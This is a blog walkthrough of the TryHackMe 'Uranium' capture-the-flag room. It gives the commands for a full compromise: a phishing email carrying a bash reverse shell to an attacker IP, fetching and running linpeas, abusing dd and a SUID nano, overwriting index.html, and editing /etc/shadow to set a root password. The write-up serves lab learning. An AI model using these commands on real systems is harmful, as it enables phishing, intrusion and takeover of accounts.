Try Hack Me Uranium Writeup

Youtube!

My second Youtube video is now live! This time around its for the Try Hack Me Uranium CTF and you can watch it here!

The Uranium Writeup!

So, This writeup is for Uranium and it is listed as Hard room on Try Hack Me (Link at the bottom)

It did challenge me! But, it was a really enjoyable room to do so I encourage you to give it a go.

Brief

The brief gave us some starting points and also gives us our goals for this which are;

Password for the Chat App
What is hakanbey’s password
user_1.txt flag
user_2.txt flag
web_flag.txt
root.txt

Starting out

Firstly, lets add the IP into our hosts

echo "<THM_IP> uranium.thm" | sudo tee -a /etc/hosts
#NOTE: I have to add whats after the | because of how i run my Kali environment, you may not need to add this

And now moving into Nmap

nmap -sC -sV -p- -oN ./nmap/initial uranium.thm

From our nmap scan, we had SSH, SMTP and HTTP open.

Does he Tweet?

In the room description there is a link to a twitter account, lets take a look

He tweets!!

So, from these tweets, we can find the following;

Domain is uranium.thm
He opens all application files with the filename “application” in terminal
We have his username

Love twitter enumeration!

The uranium site gave nothing away so lets move on….

You’ve got Mail!

The breadcrumbs I found are pointing towards an email attack so we will move into this using SWAKS.

Firstly we need a file called application with a reverse shell, since its opened in terminal, lets use bash.

echo 'bash -c "bash -i >& /dev/tcp/<YOUR_THM_IP>/9006 0>&1"' > application

Then start our netcat listener with;

nc -lnvp 9006

Then we are going to use SWAKS to send the email with;

swaks --to hakanbey@uranium.thm --from hakanbey@uranium.thm --header "RE:Coins" --body "I want coins" --attach application --server <THM_IP>

Wait until we catch the reverse shell….

In hakanbey’s home folder you will find user_1.txt and open with

cat user_1.txt

There is also a file called chat_with_kral4. Trying to run this I got a request for a password which I had no idea what it was.

We need to enumerate which I’m going to use LinPeas to do

#Change into the directory with your linpeas.sh file in then run;
python3 -m http.server
#note what port the HTTP server started on, then on the reverse shell
wget http://<Your_THM_IP>:<HTTP_PORT>/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

Lets Chat!

After running Linpeas, there was two things I prioritized looking at;

A .pcap file in /var/log
Linpeas highlighted /bin/dd

Firstly, lets get that pcap! In order to do that we are going to change into the directory, upgrade our shell, start a webserver, then download this to our Kali terminal.

# On the reverse shell
cd /var/log
export TERM=xterm
python3 -c 'import pty;pty.spwan("/bin/bash")'
python3 -m http.server 8010
# On your Kali Machine
wget http://<THM_IP>:8010/hakanbey_network_log.pcap

We have the pcap file!

Open this in wireshark, right click on the first entry then follow>TCP Stream and you will have the password for the chat app!

So, after running the webserver I had to CTRL+C to get out of it!

So i started the Netcat listener as before, sent the email we did before and i was back in with my reverse shell.

Once in there as hakanbey, I ran the chat application with;

./chat_with_kral4

When it asks you for a password this time use the one from the PCAP file.

Now, the fun part! Talk to the chat app to get hakanbey’s password!

So now lets ssh into the box as hakanbey using the password we got

ssh hakanbey@uranium.thm

Lets check what hakanbey can do with

sudo -l

Looks like there is another command hakanbey can run with that!

sudo -u <COMMAND_FROM_SUDO-L>

Now, lets change into that users home directory and you will find the user2 flag

cd /home/kral4
cat user_2.txt

A DD to the Web?

So with two flag’s left to get, i decided on the web flag!

With it being the web flag, I decided to check where the website would be

cd /var/www/html

Then looking in that folder I found web_flag.txt! Awesome!

cat web_flag.txt

And we have web flag…… no…..wait….. That would be too easy! So how do we get the flag? We had /bin/dd to check out didn’t we….

https://gtfobins.github.io/gtfobins/dd/

So that has file write, file read, suid and sudo and we want to read a file…..

/bin/dd if=web_flag.txt
#NOTE: Please look at the GTFO Bin to understand why this works rather than just pasting the code

Fake an Attack? Really?

When you SSH into the machine a note says you have mail, obviously we should be reading other peoples emails! Lets have a look in;

cd /var/mail
ls

There is mail for kral4 so lets;

cat kral4

There wasn’t a nano file in kral4’s home directory

So lets go there, copy nano and see if it has suid

cp /bin/nano /home/kral4
cd /home/kral4

So we have nano in there but it doesn’t have SUID

The copied nano doesn’t have SUID!

It did say to keep it there in case index.html was attacked again….. lets attack index.html and see what happens….

We can use the /bin/dd to make a change to the index.html file so lets do that with;

echo "theirsecurity.com" | /bin/dd of=/var/www/html/index.html

We amended the index.html file, but did we get SUID?

Success!! We got it!!

Perl to Root

We have a few different options to take to get root access, but now i have nano with SUID im going to amend etc/shadow.

So lets open this with;

./nano /etc/shadow

We obviously just cant type a new root password into their as it wouldn’t work, but we can use perl to generate one. So in a terminal window type;

perl -e "print crypt('password','\$6\$SALTsalt\$')"
#NOTE: where i have typed password, that is the password it will use to generate

So we can take this and paste this into our shadow file. Paste this between root: and the second :

If you want to see this done, you can use the video at the top of the page #shamelessplug

So CTRL+X to exit and then Y then enter.

We have changed the root password, now to use it!

su root
# then enter the password we changed it to

We are now root!

Change into the root directory and cat the root.txt file

Try Hack Me Uranium Conclusion

I really enjoyed this room a lot!

The chatbot was a great addition and i think hakanbey did an amazing job at replicating a phishing attack on a virtual machine. It was a great implementation and practicing phishing attacks isn’t common in capture the flag environments!

It is labelled as a hard room, i can see why because the path’s you take arent guided (this makes it more fun). What you see above is the way i managed to complete it, it doesn’t include every path I took that didn’t work, but I just kept going at it!

I really recommend you give this a go!

I hope you enjoyed reading!

Links

Go to http://www.tryhackme.com/ to try this and many more CTF’s

If you want to go directly to Try Hack Me Uranium – https://tryhackme.com/room/uranium – Thanks again to hakanbey01

Contact Me with any requests or suggestions for next room!

Their Security Blog

A blog relating to the world of pen testing and capture the flag games